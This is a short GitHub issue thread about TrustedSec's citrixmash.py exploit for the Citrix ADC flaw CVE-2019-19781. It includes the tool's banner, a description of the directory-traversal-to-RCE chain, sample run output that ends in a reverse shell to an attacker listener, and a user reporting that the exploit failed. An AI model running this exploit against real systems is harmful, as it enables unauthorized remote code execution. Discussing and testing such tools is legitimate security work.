Closed 0xTract0r closed 4 years ago
trustedsec
commented
4 years ago Are you running the latest versions of the scanner and exploit? I've been testing it on over 10,000 systems and have test cases up for every instance of ADC. Works as intended.
trustedsec
commented
4 years ago root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# ./citrixmash.py
Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 Company: TrustedSec, LLC Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/
This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.
Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
IP Addresses and DNS names are usable in the victim address and attacker_listener fields (if host supports DNS).
Usage:
python3 citrixmash.py
[] Firing STAGE1 POST request to create the XML template exploit to disk...
[] Saving filename as ychyhdqwwg.xml on the victim machine...
[] We got an expected response back for a vulnerable system. Initial stage exploit likely successful.
[] Sleeping for 2 seconds to ensure file is written before we call it...
[] Triggering GET request for the newly created file with a listener waiting...
[] Shell should now be in your listener... enjoy. Keep this window open..
[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/
Connection from
The result of cve-2019-19781_scanner.py is still vulnerable but citrixmash.py is not successful.I tried many